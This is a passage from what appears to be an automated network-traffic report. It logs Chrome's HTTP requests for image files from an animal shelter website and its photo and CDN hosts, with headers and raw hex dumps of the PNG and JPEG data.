                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC777INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6b 00 00 02 bc 08 03 00 00 00 87 a9 08 41 00 00 02 1f 50 4c 54 45 00 00 00 04 04 04 02 02 02 03 03 03 01 01 01 03 03 03 01 01 01 01 01 01 02 02 02 03 03 03 04 04 04 ff ff ff f4 f4 f4 f2 f2 f2 fe fe fe fe fe fe fc fc fc fc fc fc fb fb fb f3 f3 f3 fd fd fd fa fa fa ee ee ee 34 34 34 e3 e3 e3 bf bf bf cc cc cc 5a 5a 5a d8 d8 d8 43 43 43 87 87 87 af af af 75 75 75 75 75 75 9e 9e 9e 96 95 95 a6 a4 a4 b4 b4 b4 55 55 55 99 99 99 de de de ff ff ff 31 28 28 3a 30 2f 46 3a 3a 3e 35 36 34 30 30 2c 23 23 28 1e 1d 40 3c 3c 42 33 32 1f 17 17 4a 40 40 4b 47 47 38 2c 2b 1b 11 12 fb fa f9 5c 4a 48 71 69 6a 54 43 42 5d 58 59 63 53 52 4f 3f 3f 46 43 44 55 51 53 52 4c 4d 15 0c 0c 52 48 48 0c 06 07 65 5e 5e f1 ee eb 6a
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRkAPLTE444ZZZCCCuuuuuuUUU1((:0/F::>56400,##(@<<B32J@@KGG8,+\JHqijTCB]XYcSRO??FCDUQSRLMRHHe^^j
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 37 18 cd 1b e2 e1 48 2d 6e 30 dc 60 84 d4 99 c0 91 d4 02 ab 14 62 a5 99 21 8e 17 94 45 6d 10 57 9a 22 1e 27 48 d4 06 83 89 4c 05 be 00 6a 83 c1 a5 11 5f 26 48 ed 50 1b 9c dd 9e 92 f8 72 81 b4 47 6d 70 7a a6 f1 54 c8 2c 1c 7e cd c3 ef 84 55 81 a7 24 75 e6 12 80 9f 52 2b 79 72 81 14 4e 82 c0 d1 4c e3 2b 21 63 3d b6 29 8c d9 9e a1 c7 a1 c8 f3 fe 35 10 a9 be 37 e4 06 49 92 d1 e0 ce 98 f3 7a 5b f7 da 7a 13 38 0a 69 ac d3 99 8b da 9e c5 a6 6e 9a 43 57 55 87 76 53 84 1e 47 21 a5 33 1c 1c 9f 2b 61 15 f1 50 45 fd d6 ed 97 e5 7a f9 f0 b4 7a 7d 69 db ed 26 e7 58 24 fb de f0 f9 36 3f 69 26 79 b0 62 db bd ef f7 0f eb fb db 72 f9 58 ae 56 87 a6 69 9f eb ed e7 7c e3 58 4a 7b dc c3 9a 93 a8 ff 9e 79 fd 56 95 bb 72 b7 2b 57 9f 8f a7 c7 f5 f2 be aa aa a6 eb da bb 10 38 1a
                                                                                                                                                                                                                                                        Data Ascii: 7H-n0`b!EmW"'HLj_&HPrGmpzT,~U$uR+yrNL+!c=)57Iz[z8inCWUvSG!3+aPEzz}i&X$6?i&ybrXVi|XJ{yVr+W8
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 1b c9 1e bc cc 7b fa ff bb b1 b2 b4 49 77 23 7f 5c 81 e0 2d db c0 b1 cc de 62 f1 d2 01 6a 57 66 af d7 6d b6 ea fa b6 22 47 b7 f7 ee ef 11 68 78 50 8a 16 33 62 86 a6 82 25 4e d2 b2 20 8f b9 c3 59 05 5c e4 a2 46 c6 c8 64 33 78 e0 55 56 23 e6 b2 8c 1a ac 94 4b 85 c9 64 3a 75 a9 1d e2 29 81 5b 55 23 f5 87 22 7f 43 22 70 5b ec 54 a2 f7 88 f7 5a 0a 09 b8 a7 63 59 26 cc b3 db ed d6 d0 e3 50 a2 32 a4 28 51 85 22 9b 01 d0 28 61 03 6e 9c f7 23 96 19 1c e3 0c 76 50 e0 c7 45 02 09 98 71 d2 86 f8 96 d5 e2 d9 38 9e 69 34 44 e5 4a 41 e6 3e 5c 12 9d df 99 b3 10 37 b1 9a 6f e7 26 c1 40 ff 92 84 ef 9f f3 e6 df 00 67 77 bd af e5 c8 e7 6d db b1 6a 57 8d 5e 0b 61 6d 3c 99 28 28 36 15 99 c5 5d 0e 02 05 c5 00 04 d8 34 75 9e 8b b1 7d 66 e9 64 64 f8 ac d1 7d 3c 51 61 9f 19 fa 2c
                                                                                                                                                                                                                                                        Data Ascii: {Iw#\-bjWfm"GhxP3b%N Y\Fd3xUV#Kd:u)[U#"C"p[TZcY&P2(Q"(an#vPEq8i4DJA>\7o&@gwmjW^am<((6]4u}fdd}<Qa,
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 9a 8e 50 67 0b aa 28 80 24 35 80 98 ad 0f 44 04 35 8f f2 e8 04 2d fa fb 00 8e 74 68 df a5 4b 58 72 1e 4f c8 1f 02 67 e5 d9 d9 e8 d6 ec ec 6c 73 79 b7 56 5b 6e d6 ea cd ad 5a 6d 8b 56 2b 01 d0 3b d0 8f 9a d5 1f 75 7d 51 e0 0a 99 11 ff b0 60 30 1c 27 cf 42 38 e6 3b 61 0d f4 a2 48 9f 5c e8 32 7f e0 6d 4b 2a 7c f0 55 ac 46 a7 d0 e4 b5 a9 49 07 3e 43 85 ae 2e 51 88 7a 48 af d0 78 9a 5a e6 c4 d9 99 93 2d 66 8f 8e 9e 9f 1c 3f 99 b8 7a f9 3b ff 73 0a f5 6f 0a 89 cf 1b 87 3c 55 d1 58 0a 4e 83 ce 3c 88 54 a7 d9 ec 16 90 b8 24 9b 0d ee 71 63 1b b0 d2 15 30 23 bb 0b 46 a3 71 6f b6 3b db dd 9a ed ee ee 2e 23 f5 7a a3 5e 6f d6 6a f5 e5 26 5b 5b cd ad 28 5f 83 36 45 e5 3c 70 1b 0a 97 48 09 30 53 06 41 fa d7 5c 08 a3 37 16 4a 66 71 04 5d 1d f8 d9 d9 8b 0b d5 f0 be 65 ce
                                                                                                                                                                                                                                                        Data Ascii: Pg($5D5-thKXrOglsyV[nZmV+;u}Q`0'B8;aH\2mK*|UFI>C.QzHxZ-f?z;so<UXN<T$qc0#Fqo;.#z^oj&[[(_6E<pH0SA\7Jfq]e
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 11 38 7b 24 56 03 4b 9b 7b 2d b4 e7 de e6 66 ab b5 83 b1 d6 d8 6c a0 4a 71 3d d1 a1 9d 9a 49 7d a3 d1 92 5a dd de 69 d7 a2 3e 9f cf ef 0d 7a e1 35 5d 5d ab 27 57 b0 d7 42 21 46 70 96 b4 27 c0 62 c5 e5 a2 d5 c0 d9 d1 e1 fc f1 f1 d3 0b b9 a4 e8 d1 f7 5e 84 da fe 83 3d a0 83 4f 84 14 5a 20 09 a4 8d 17 18 99 f3 28 d8 2b 05 54 44 08 56 ef 55 a5 2a 41 d8 ab 7b 38 af e3 e2 a2 f9 02 d4 c2 10 7b 9b 5a bb bb b6 b6 ba ba 3a b5 8e de 9d 60 40 81 89 89 cb 6f 3b da e0 f3 33 ef 40 64 2c c0 a9 18 99 20 68 4d 00 27 35 ea 51 f6 48 1b 7a b2 bc 43 e8 3e af 17 b0 cd 4a 7d 3e fa f9 cf 3b 9b 9d cd 46 7b 1b 3a 03 6c ad 9d 9d 06 e6 1a 82 f5 86 02 6d 2c cb 62 eb b0 21 a9 d7 f1 47 37 9a 89 28 63 67 f9 82 6a c7 e2 49 f5 ba 68 f3 f6 eb 2a 83 b3 f3 12 23 a5 f2 99 15 d8 85 d9 52 4e 76
                                                                                                                                                                                                                                                        Data Ascii: 8{$VK{-flJq=I}Zi>z5]]'WB!Fp'b^=OZ (+TDVU*A{8{Z:`@o;3@d, hM'5QHzC>J}>;F{:lm,b!G7(cgjIh*#RNv
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 9c e4 c8 48 24 32 cc 38 7d 40 8d 73 40 3c 76 ea fd bd c2 ed fe 4b 56 db 3d 50 ee 52 ae 51 7e f4 c8 02 6b 1d 41 8d 4f 1d 25 a9 5c 68 a7 b1 b7 43 7e 60 a3 dd ae b7 1a 9d bd c6 32 e9 f8 ad ee 96 50 b6 5c ab 01 37 61 2b 9a 88 85 7c 51 8d ad 9b b0 d4 f2 28 c1 36 9f b7 6f c0 6f cc e6 0d 49 1b e0 d4 b3 e3 19 f0 c3 a7 e0 4d 36 8c 3a 65 82 63 63 f9 f9 e9 4a b6 98 77 9c 52 b6 54 14 de a8 95 7e 65 4b c8 67 df f5 c6 c1 06 ce 2e d6 03 e9 3e dc 6b 0b e4 a4 18 b8 6e 18 b5 21 31 0e c3 46 01 6e 36 d6 8e 0a 1c 98 ac 90 19 18 42 7a da 90 2d c7 96 fc 24 9e 7a 66 eb 2f 62 09 d6 14 a2 e2 80 5b 29 6d 21 2b a8 0f f1 44 9e 5f 7f f2 7a 60 b3 57 74 fe e5 85 65 47 f2 c7 d2 da 89 eb 00 ea fa 93 99 5b 37 66 6e cc cd dc b8 31 a3 79 8e 2d 0d 5a fb 74 e6 f4 74 66 ee f4 74 ee 05 6f 5c 29
                                                                                                                                                                                                                                                        Data Ascii: H$28}@s@<vKV=PRQ~kAO%\hC~`2P\7a+|Q(6ooIM6:eccJwRT~eKg.>kn!1Fn6Bz-$zf/b[)m!+D_z`WteG[7fn1y-Zttfto\)
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 6b 80 fa 64 15 20 7f 04 dc ec bf dc 2f 55 4a f3 dd 00 ac a3 48 2e 6c 66 24 c6 dc 62 09 89 ed 28 d2 01 de 14 54 db 13 d2 04 3e fb 12 f7 53 50 23 7e db 2d 77 b7 a2 65 fd 7e 19 68 99 5f 90 4e 38 ce e8 28 de 42 78 88 d2 8f 21 5c 04 e1 d9 0b dc fc 7d 5e fc d0 90 2f cc 66 d0 52 a6 46 6b 4a cd 7a 22 f1 48 3c cb d0 f6 85 8c 53 92 b1 19 67 9d cd 65 33 3c 40 a8 d5 a3 17 13 7f db f4 80 d8 de f9 a6 06 b2 1e bc 38 a9 9d 9e 56 49 23 dd a8 46 80 81 00 64 48 33 0c b9 2e 00 4f 33 7d 66 32 c5 ce 8f 08 6e ec 03 43 fd 94 69 55 5b c8 77 b5 22 08 6d 58 10 ce 88 10 fe 63 43 02 08 dd 22 6a 62 6d 16 a8 a2 fe 2f ec 8d 3d 3f c3 a2 85 b6 26 26 b0 d9 e7 ee 60 89 50 0b 37 23 af 91 c6 c0 eb 4f 11 f0 75 cb 55 89 66 ea 63 72 cd b3 7d fd 16 3c 07 a8 60 b4 19 1d 04 51 82 da f4 22 4c 76 0b
                                                                                                                                                                                                                                                        Data Ascii: kd /UJH.lf$b(T>SP#~-we~h_N8(Bx!\}^/fRFkJz"H<Sge3<@8VI#FdH3.O3}f2nCiU[w"mXcC"jbm/=?&&`P7#OuUfcr}<`Q"Lv
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 46 46 f0 ef a3 23 3e 5e bd 19 19 cb e5 50 6f a2 9c 6c a6 70 a3 90 ab c8 2c 99 9b ae ce 63 8a 11 b7 b8 31 27 35 3a 27 a9 2e ca 15 cb 57 2b c5 c2 74 b5 5a d5 7b 61 9d 0c 4f 75 0e 6d 98 c5 6c a9 56 c1 e8 62 b5 24 18 a5 d2 32 fa e3 71 80 98 2f a0 42 f9 bd 22 61 77 c1 0d ad 95 e3 27 e2 a8 54 87 25 48 4b a6 0c 7b 99 08 6e 82 dd 73 99 6c 57 fa ae 90 78 f7 c9 2d a8 b7 20 b0 06 bc f6 f8 ce 0f 7e f0 83 3b 3f 79 6c 78 13 ea b6 f7 77 b6 71 10 e0 34 41 cc 38 ad 61 99 ab da 72 b7 2c ac d1 ed 38 54 06 66 ee 34 e4 f3 25 14 f7 f0 f9 42 23 d1 4c 7a 6c c4 17 1e 8b 47 d0 a2 d6 70 ef 77 89 cc 44 b1 3d db 09 fa 6d 47 2f 47 48 32 0c 04 8f 14 89 f8 9c c3 99 25 79 92 38 81 24 ec 9c 4c 73 6e 47 47 4f 5e be eb af e9 8a 7e 12 9c 5d 58 f4 fe 11 b5 19 af 1e 1f fa fb 8d d2 98 04 05 70
                                                                                                                                                                                                                                                        Data Ascii: FF#>^Polp,c1'5:'.W+tZ{aOumlVb$2q/B"aw'T%HK{nslWx- ~;?ylxwq4A8ar,8Tf4%B#LzlGpwD=mG/GH2%y8$LsnGGO^~]Xp
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 99 23 c3 01 bb bf 4c be c8 f8 f7 62 e5 28 fd 29 72 40 b7 71 07 50 96 68 51 54 28 08 c3 74 63 25 c1 7c 7b bc 6f 9c d6 6a 89 d8 88 fa ee 36 6b 1d cb 98 36 77 cb a1 21 3f d9 00 5e 8e e0 d7 55 43 95 fa 62 91 a1 91 70 c8 c7 3f 08 af 05 a5 3e dd 68 9a 91 6a 40 f4 66 46 07 1f 44 ea 14 2d e1 16 d6 78 f4 b0 26 d3 a5 e9 c5 35 12 21 50 77 04 ab 33 27 d3 8d 5f 1a 1b 4b 3f 3f 79 f2 06 89 ed 13 1f f8 a7 a3 b6 d7 2d f4 fe 54 63 0f 1d 16 f3 0b 78 77 b9 20 7a 4f aa f3 3c 7e ab 09 b0 5c 11 12 ac a4 de 8d 5c a2 3c bb 4d c8 4c 85 0c cc aa 32 5d ee ba e1 22 94 28 ec a6 d5 00 bf 23 f3 df 54 b0 c4 c2 27 b8 02 ac 05 bd 5e ad 9f 08 4d 29 46 29 04 53 0c da 70 27 b0 46 91 05 2a 14 90 21 25 a4 08 d8 32 d2 a9 c0 4e e4 e5 10 d5 20 4d 40 64 76 be 0a e1 21 39 e6 22 df 65 2b c5 f9 2a 4e
                                                                                                                                                                                                                                                        Data Ascii: #Lb()r@qPhQT(tc%|{oj6k6w!?^UCbp?>hj@fFD-x&5!Pw3'_K??y-Tcxw zO<~\\<ML2]"(#T'^M)F)Sp'F*!%2N M@dv!9"e+*N
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: a8 b4 c7 74 3d 71 30 b6 7a 63 93 88 7e 84 33 13 15 68 88 a0 a2 b3 24 e9 54 61 55 0e c5 66 63 65 83 9a d5 94 ca 50 63 0b 4a 63 f0 a7 a6 b6 88 ba 31 31 cc 80 a2 1f fc f2 95 2b 72 08 ce 3b 15 fa 8c d5 f8 08 cb 3c 90 1e 13 19 be 9a b9 92 22 21 f6 05 41 76 40 16 58 4b 63 72 88 61 b0 39 60 26 99 50 25 c8 28 0b 06 74 88 7a b3 6a a1 90 44 c8 03 0c 2b 32 00 77 01 d2 6c 12 68 f0 50 0b 7e c2 1b e9 25 3e 28 52 b0 2b c0 b2 76 70 66 c1 55 9e 28 4a 95 dc 68 91 4d 6a 23 b0 0a d9 15 f6 4a 00 92 50 1b 1f f9 0a f2 58 53 18 71 a6 45 75 fb 83 63 53 e3 44 d7 f0 0d 94 f6 64 de 11 a0 3a 3f ff 39 9c cf d5 e9 a8 ed 9d 0f 9a 53 a1 5e 88 6f db 0a 3e 3a 8d ce 6e 07 13 af 55 ef f0 88 ba 11 36 1f 99 02 12 05 e0 0d 72 53 c9 90 5f 58 4b f2 e8 09 d9 82 96 8b b4 80 3b f9 dd 90 ae 15 36 b9
                                                                                                                                                                                                                                                        Data Ascii: t=q0zc~3h$TaUfcePcJc11+r;<"!Av@XKcra9`&P%(tzjD+2wlhP~%>(R+vpfU(JhMj#JPXSqEucSDd:?9S^o>:nU6rS_XK;6


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        63192.168.2.44981613.107.246.454432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC622OUTGET /photos/352/fe090341-f359-4d15-a7d0-260c04791544.jpg HTTP/1.1
                                                                                                                                                                                                                                                        Host: g.petango.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Content-Length: 57711
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Thu, 19 Dec 2024 20:08:35 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DD2068EB4A90A1
                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                        x-ms-request-id: b35178ec-c01e-000b-603a-6233f4000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20250109T015913Z-156796c549btx6v5hC1EWRq6c800000016bg0000000067yf
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_MISS
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC15850INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff db 00 84 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 02 30 01 a4 03 01 22 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0
                                                                                                                                                                                                                                                        Data Ascii: JFIF,,0"}!1AQa"q2#BR
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC16384INData Raw: 0a f4 4f 1e eb 36 72 e9 8e 90 59 1b 32 78 f3 e7 94 bf e4 bd cd 79 51 b8 8e 39 4b c7 fb d6 1c 79 b3 ff 00 41 db e9 5d 11 d8 f2 f1 16 e6 b2 2d bd 95 a4 48 c5 75 05 91 b3 85 11 23 10 de f5 5f 2b 6c 43 93 2b 90 78 e3 14 b3 6a 57 7e 62 c6 f2 bb 2e 38 5d de 58 fd 29 97 8c 8d b5 96 61 b4 2f 21 73 81 f9 d6 87 21 7a cf c7 1a 9d 9c c9 f6 62 48 5e 00 7f 9b 8f c4 71 5e c5 f0 97 c4 5a 96 b5 a9 04 1a a2 5a 34 98 0d 1c 90 a3 26 3a 1c 94 e9 eb f7 7f 1a f1 bd 08 4c d2 07 10 79 d1 67 db 38 f5 03 a9 af 5d f0 9f 8b ef 74 a2 22 b4 93 4c b7 71 83 18 bb b6 48 dc 37 71 92 40 39 fa d0 07 a1 fc 47 d1 ef 2f 3c 35 39 d3 a5 4b d8 c2 91 2a c7 2e d8 f8 c0 ce 36 8e 0f 1e b8 af 92 75 ad 3a 4b 4b b9 1e 42 b1 06 38 0a 92 79 98 f6 ce 2b ed 7d 2b c6 3f f0 97 e9 cb 65 af 5b ff 00 a4 b9 51 1c
                                                                                                                                                                                                                                                        Data Ascii: O6rY2xyQ9KyA]-Hu#_+lC+xjW~b.8]X)a/!s!zbH^q^ZZ4&:Lyg8]t"LqH7q@9G/<59K*.6u:KKB8y+}+?e[Q
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC16384INData Raw: ec 05 79 f6 bf ae 4d ae ea 2f 73 23 2a ae e0 a8 aa 4e 02 fb 57 41 ae 7c 4c 1a c4 6d 6b 75 a7 24 f0 0f 99 4a b8 61 8e cd 9a e4 9a 3b 0b ab c4 5b 79 9e d9 fe f2 c7 31 f9 54 fd 45 78 39 4d 3a d8 7a b3 c5 63 e0 dc df 5d d2 5f 2d 8f 3b 10 e3 34 a1 45 e8 46 11 9f 7a 0d a7 03 fe fa f7 aa 52 42 b6 f2 09 96 25 7d dc 96 90 02 38 ec 45 74 0d e1 ed 5c 5d a4 9f 66 91 d0 9c 06 56 ce e2 47 6f 6a 92 3f 05 eb 1a a4 a1 63 b3 95 4a 9c 33 3a e1 7f 0a fa af ed 4c 17 2f 33 aa be f3 83 d8 d4 bd b9 59 83 65 72 f1 43 74 b0 0f 24 4e 77 48 90 a8 0b f5 20 57 2d aa 4f a7 dc eb 48 b7 d6 42 ec 41 b5 a2 46 6f 95 64 0d 90 71 d3 b5 7b 4a 7c 3e b0 d0 2d 4d de bd 7a 90 46 80 bb 45 17 de c0 1c fd 4d 79 74 96 3a 37 88 bc 43 79 7d 75 ae 5a 68 50 1c 24 36 61 4c b2 2a 2f 00 30 5c 9d c7 bd 79 f4
                                                                                                                                                                                                                                                        Data Ascii: yM/s#*NWA|Lmku$Ja;[y1TEx9M:zc]_-;4EFzRB%}8Et\]fVGoj?cJ3:L/3YerCt$NwH W-OHBAFodq{J|>-MzFEMyt:7Cy}uZhP$6aL*/0\y
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC9093INData Raw: fb 5f 76 d6 23 e6 5f 4a f4 7d 2f 4b d2 7c 11 69 24 70 c4 8f 70 46 e2 dd 4e 7b e0 d7 81 98 f1 05 0b 3c 3e 19 7b 49 bd 34 d8 e8 a3 84 9b f7 e7 a2 47 63 a6 44 f7 3a 6c 29 2e dd f8 05 f7 f3 b4 76 1e e6 b8 5f 1f ea 33 78 4c 15 b2 82 26 46 39 24 2f 4f 7f 6a e8 3c 3f e2 30 6e d1 ae 5c 9d e0 90 8a 08 0b f8 f7 ad bf 13 e8 76 be 22 d2 dd 56 25 3b 87 46 3c 93 eb 5f 96 c6 13 cb b1 91 58 b8 7b af 75 d0 fa 06 d5 7a 4f d9 bd 4f 9d af bc 75 ab df 06 5d eb 01 63 f2 63 03 e5 ac b9 fc 55 aa 87 00 dd 4b 24 80 8d c9 1f 23 1f 5a bd ab 68 e7 49 be b9 b3 2c a3 68 e7 cc 03 77 1e 9e d5 8c f6 a3 cb ce e5 19 04 fc 8d cf e3 ed 5f b7 61 f0 58 2a 94 94 e9 d3 56 7e 47 ca ca ad 55 26 a5 26 5e b5 f1 c4 91 97 37 16 c8 ee 0f cd 23 0e 71 ed 52 5c f8 ff 00 53 bb 83 75 ba b5 b4 04 60 32 8e 73
                                                                                                                                                                                                                                                        Data Ascii: _v#_J}/K|i$ppFN{<>{I4GcD:l).v_3xL&F9$/Oj<?0n\v"V%;F<_X{uzOOu]ccUK$#ZhI,hw_aX*V~GU&&^7#qR\Su`2s


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        64192.168.2.449823192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC398OUTGET /wp-content/uploads/2025/01/stuart-768x723.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC599INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 572544
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2025/01/stuart-768x723.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Wed, 08 Jan 2025 17:22:33 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC770INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 00 00 00 02 d3 08 06 00 00 00 a1 5c 65 bb 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 20 00 49 44 41 54 78 9c ec bd 79 ac a5 e7 5d e7 f9 79 9e e7 5d ce 72 b7 5a 5d ae 2a 97 ed 78 49 62 9c 4a 62 1c c7 d9 08 59 81 34 43 42 08 84 81 86 51 0f 1a ba 99 1e 69 34 ea 85 19 b5 50 13 8d 10 42 ad 56 0b f5 a0 ee 61 34 62 98 99 ce 40 03 e9 00 81 4e 87 74 27 71 12 e3 25 8e 1d db f1 ee 72 f9 ba 5c cb ad bb 9e e5 3d ef f2 2c f3 c7 ef 3d e7 5e 9b 84 2c ae dd cf 47 3a ba 4b dd 73 ce 7b 6e dd f3 be bf e5 fb fb fe 20 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR\epHYs+ IDATxy]y]rZ]*xIbJbY4CBQi4PBVa4b@Nt'q%r\=,=^,G:Ks{n D"H$D"H$D"H$D"H$D"H$D"H$D"H$D"H$D"
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 83 bc 91 57 c6 26 f0 69 e0 cf 11 0b d2 13 b1 23 10 89 44 22 91 c8 f7 4e bc 7a 46 22 e7 88 10 c2 6e 44 d6 f3 1e 64 88 f7 76 64 80 37 72 6e 39 0d 7c 05 e9 08 7c 05 59 4a 16 3b 02 91 c8 65 40 2b 89 9c ca 1d e7 10 e3 83 25 44 06 a9 91 99 20 8d 38 87 d5 88 95 f0 2a 62 27 5c 03 85 52 ca fe cd 47 8e 44 22 df 0b 31 01 88 44 5e 01 ad 5d e7 61 e0 4e a4 da 3f d5 f5 27 17 f1 b0 5e 2d ac 20 4b c8 fe 03 f0 59 e0 78 0c 0c 22 91 4b 8b 10 c2 1c 62 6e f0 1a 64 b3 f8 1b 90 80 5f 23 41 ff 74 29 e1 74 77 c9 ce 64 de 02 25 92 04 94 ed d7 27 81 47 90 7d 23 8f 29 a5 06 17 e4 85 44 22 57 18 31 01 88 44 be 07 da 80 1f e4 42 75 1d f0 f7 81 9f 41 2a 59 0b 48 65 2b 72 e1 f0 48 65 70 13 09 08 fe 09 51 1a 14 89 5c 50 5e 76 5e 4c 90 0e e8 db 11 b3 83 a3 c8 f9 31 6b 3f f6 78 65 66 07 16
                                                                                                                                                                                                                                                        Data Ascii: W&i#D"NzF"nDdvd7rn9||YJ;e@+%D 8*b'\RGD"1D^]aN?'^- KYx"Kbnd_#At)twd%'G}#)D"W1DBuA*YHe+rHepQ\P^v^L1k?xef
